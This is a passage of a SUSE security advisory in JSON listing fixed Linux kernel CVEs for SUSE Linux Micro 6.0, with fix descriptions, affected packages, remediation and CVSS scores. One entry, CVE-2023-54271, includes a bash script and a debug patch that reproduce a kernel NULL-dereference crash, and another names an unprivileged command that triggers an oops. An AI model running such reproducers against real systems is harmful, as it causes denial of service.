"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54264",
"url": "https://www.suse.com/security/cve/CVE-2023-54264"
},
{
"category": "external",
"summary": "SUSE Bug 1255872 for CVE-2023-54264",
"url": "https://bugzilla.suse.com/1255872"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54264"
},
{
"cve": "CVE-2023-54266",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54266"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: m920x: Fix a potential memory leak in m920x_i2c_xfer()\n\n\u0027read\u0027 is freed when it is known to be NULL, but not when a read error\noccurs.\n\nRevert the logic to avoid a small leak, should a m920x_read() call fail.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54266",
"url": "https://www.suse.com/security/cve/CVE-2023-54266"
},
{
"category": "external",
"summary": "SUSE Bug 1255875 for CVE-2023-54266",
"url": "https://bugzilla.suse.com/1255875"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54266"
},
{
"cve": "CVE-2023-54267",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54267"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: Rework lppaca_shared_proc() to avoid DEBUG_PREEMPT\n\nlppaca_shared_proc() takes a pointer to the lppaca which is typically\naccessed through get_lppaca(). With DEBUG_PREEMPT enabled, this leads\nto checking if preemption is enabled, for example:\n\n BUG: using smp_processor_id() in preemptible [00000000] code: grep/10693\n caller is lparcfg_data+0x408/0x19a0\n CPU: 4 PID: 10693 Comm: grep Not tainted 6.5.0-rc3 #2\n Call Trace:\n dump_stack_lvl+0x154/0x200 (unreliable)\n check_preemption_disabled+0x214/0x220\n lparcfg_data+0x408/0x19a0\n ...\n\nThis isn\u0027t actually a problem however, as it does not matter which\nlppaca is accessed, the shared proc state will be the same.\nvcpudispatch_stats_procfs_init() already works around this by disabling\npreemption, but the lparcfg code does not, erroring any time\n/proc/powerpc/lparcfg is accessed with DEBUG_PREEMPT enabled.\n\nInstead of disabling preemption on the caller side, rework\nlppaca_shared_proc() to not take a pointer and instead directly access\nthe lppaca, bypassing any potential preemption checks.\n\n[mpe: Rework to avoid needing a definition in paca.h and lppaca.h]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54267",
"url": "https://www.suse.com/security/cve/CVE-2023-54267"
},
{
"category": "external",
"summary": "SUSE Bug 1255899 for CVE-2023-54267",
"url": "https://bugzilla.suse.com/1255899"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54267"
},
{
"cve": "CVE-2023-54271",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54271"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: Fix NULL deref caused by blkg_policy_data being installed before init\n\nblk-iocost sometimes causes the following crash:\n\n BUG: kernel NULL pointer dereference, address: 00000000000000e0\n ...\n RIP: 0010:_raw_spin_lock+0x17/0x30\n Code: be 01 02 00 00 e8 79 38 39 ff 31 d2 89 d0 5d c3 0f 1f 00 0f 1f 44 00 00 55 48 89 e5 65 ff 05 48 d0 34 7e b9 01 00 00 00 31 c0 \u003cf0\u003e 0f b1 0f 75 02 5d c3 89 c6 e8 ea 04 00 00 5d c3 0f 1f 84 00 00\n RSP: 0018:ffffc900023b3d40 EFLAGS: 00010046\n RAX: 0000000000000000 RBX: 00000000000000e0 RCX: 0000000000000001\n RDX: ffffc900023b3d20 RSI: ffffc900023b3cf0 RDI: 00000000000000e0\n RBP: ffffc900023b3d40 R08: ffffc900023b3c10 R09: 0000000000000003\n R10: 0000000000000064 R11: 000000000000000a R12: ffff888102337000\n R13: fffffffffffffff2 R14: ffff88810af408c8 R15: ffff8881070c3600\n FS: 00007faaaf364fc0(0000) GS:ffff88842fdc0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00000000000000e0 CR3: 00000001097b1000 CR4: 0000000000350ea0\n Call Trace:\n \u003cTASK\u003e\n ioc_weight_write+0x13d/0x410\n cgroup_file_write+0x7a/0x130\n kernfs_fop_write_iter+0xf5/0x170\n vfs_write+0x298/0x370\n ksys_write+0x5f/0xb0\n __x64_sys_write+0x1b/0x20\n do_syscall_64+0x3d/0x80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0\n\nThis happens because iocg-\u003eioc is NULL. The field is initialized by\nioc_pd_init() and never cleared. The NULL deref is caused by\nblkcg_activate_policy() installing blkg_policy_data before initializing it.\n\nblkcg_activate_policy() was doing the following:\n\n1. Allocate pd\u0027s for all existing blkg\u0027s and install them in blkg-\u003epd[].\n2. Initialize all pd\u0027s.\n3. Online all pd\u0027s.\n\nblkcg_activate_policy() only grabs the queue_lock and may release and\nre-acquire the lock as allocation may need to sleep. ioc_weight_write()\ngrabs blkcg-\u003elock and iterates all its blkg\u0027s. The two can race and if\nioc_weight_write() runs during #1 or between #1 and #2, it can encounter a\npd which is not initialized yet, leading to crash.\n\nThe crash can be reproduced with the following script:\n\n #!/bin/bash\n\n echo +io \u003e /sys/fs/cgroup/cgroup.subtree_control\n systemd-run --unit touch-sda --scope dd if=/dev/sda of=/dev/null bs=1M count=1 iflag=direct\n echo 100 \u003e /sys/fs/cgroup/system.slice/io.weight\n bash -c \"echo \u00278:0 enable=1\u0027 \u003e /sys/fs/cgroup/io.cost.qos\" \u0026\n sleep .2\n echo 100 \u003e /sys/fs/cgroup/system.slice/io.weight\n\nwith the following patch applied:\n\n\u003e diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c\n\u003e index fc49be622e05..38d671d5e10c 100644\n\u003e --- a/block/blk-cgroup.c\n\u003e +++ b/block/blk-cgroup.c\n\u003e @@ -1553,6 +1553,12 @@ int blkcg_activate_policy(struct gendisk *disk, const struct blkcg_policy *pol)\n\u003e \t\tpd-\u003eonline = false;\n\u003e \t}\n\u003e\n\u003e + if (system_state == SYSTEM_RUNNING) {\n\u003e + spin_unlock_irq(\u0026q-\u003equeue_lock);\n\u003e + ssleep(1);\n\u003e + spin_lock_irq(\u0026q-\u003equeue_lock);\n\u003e + }\n\u003e +\n\u003e \t/* all allocated, init in the same order */\n\u003e \tif (pol-\u003epd_init_fn)\n\u003e \t\tlist_for_each_entry_reverse(blkg, \u0026q-\u003eblkg_list, q_node)\n\nI don\u0027t see a reason why all pd\u0027s should be allocated, initialized and\nonlined together. The only ordering requirement is that parent blkgs to be\ninitialized and onlined before children, which is guaranteed from the\nwalking order. Let\u0027s fix the bug by allocating, initializing and onlining pd\nfor each blkg and holding blkcg-\u003elock over initialization and onlining. This\nensures that an installed blkg is always fully initialized and onlined\nremoving the the race window.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54271",
"url": "https://www.suse.com/security/cve/CVE-2023-54271"
},
{
"category": "external",
"summary": "SUSE Bug 1255902 for CVE-2023-54271",
"url": "https://bugzilla.suse.com/1255902"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54271"
},
{
"cve": "CVE-2023-54276",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54276"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: move init of percpu reply_cache_stats counters back to nfsd_init_net\n\nCommit f5f9d4a314da (\"nfsd: move reply cache initialization into nfsd\nstartup\") moved the initialization of the reply cache into nfsd startup,\nbut didn\u0027t account for the stats counters, which can be accessed before\nnfsd is ever started. The result can be a NULL pointer dereference when\nsomeone accesses /proc/fs/nfsd/reply_cache_stats while nfsd is still\nshut down.\n\nThis is a regression and a user-triggerable oops in the right situation:\n\n- non-x86_64 arch\n- /proc/fs/nfsd is mounted in the namespace\n- nfsd is not started in the namespace\n- unprivileged user calls \"cat /proc/fs/nfsd/reply_cache_stats\"\n\nAlthough this is easy to trigger on some arches (like aarch64), on\nx86_64, calling this_cpu_ptr(NULL) evidently returns a pointer to the\nfixed_percpu_data. That struct looks just enough like a newly\ninitialized percpu var to allow nfsd_reply_cache_stats_show to access\nit without Oopsing.\n\nMove the initialization of the per-net+per-cpu reply-cache counters\nback into nfsd_init_net, while leaving the rest of the reply cache\nallocations to be done at nfsd startup time.\n\nKudos to Eirik who did most of the legwork to track this down.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54276",
"url": "https://www.suse.com/security/cve/CVE-2023-54276"
},
{
"category": "external",
"summary": "SUSE Bug 1255907 for CVE-2023-54276",
"url": "https://bugzilla.suse.com/1255907"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54276"
},
{
"cve": "CVE-2023-54278",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54278"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/vmem: split pages when debug pagealloc is enabled\n\nSince commit bb1520d581a3 (\"s390/mm: start kernel with DAT enabled\")\nthe kernel crashes early during boot when debug pagealloc is enabled:\n\nmem auto-init: stack:off, heap alloc:off, heap free:off\naddressing exception: 0005 ilc:2 [#1] SMP DEBUG_PAGEALLOC\nModules linked in:\nCPU: 0 PID: 0 Comm: swapper Not tainted 6.5.0-rc3-09759-gc5666c912155 #630\n[..]\nKrnl Code: 00000000001325f6: ec5600248064 cgrj %r5,%r6,8,000000000013263e\n 00000000001325fc: eb880002000c srlg %r8,%r8,2\n #0000000000132602: b2210051 ipte %r5,%r1,%r0,0\n \u003e0000000000132606: b90400d1 lgr %r13,%r1\n 000000000013260a: 41605008 la %r6,8(%r5)\n 000000000013260e: a7db1000 aghi %r13,4096\n 0000000000132612: b221006d ipte %r6,%r13,%r0,0\n 0000000000132616: e3d0d0000171 lay %r13,4096(%r13)\n\nCall Trace:\n __kernel_map_pages+0x14e/0x320\n __free_pages_ok+0x23a/0x5a8)\n free_low_memory_core_early+0x214/0x2c8\n memblock_free_all+0x28/0x58\n mem_init+0xb6/0x228\n mm_core_init+0xb6/0x3b0\n start_kernel+0x1d2/0x5a8\n startup_continue+0x36/0x40\nKernel panic - not syncing: Fatal exception: panic_on_oops\n\nThis is caused by using large mappings on machines with EDAT1/EDAT2. Add\nthe code to split the mappings into 4k pages if debug pagealloc is enabled\nby CONFIG_DEBUG_PAGEALLOC_ENABLE_DEFAULT or the debug_pagealloc kernel\ncommand line option.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54278",
"url": "https://www.suse.com/security/cve/CVE-2023-54278"
},
{
"category": "external",
"summary": "SUSE Bug 1255911 for CVE-2023-54278",
"url": "https://bugzilla.suse.com/1255911"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54278"
},
{
"cve": "CVE-2023-54281",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54281"
}
],
"notes": [
{
"category": "general",
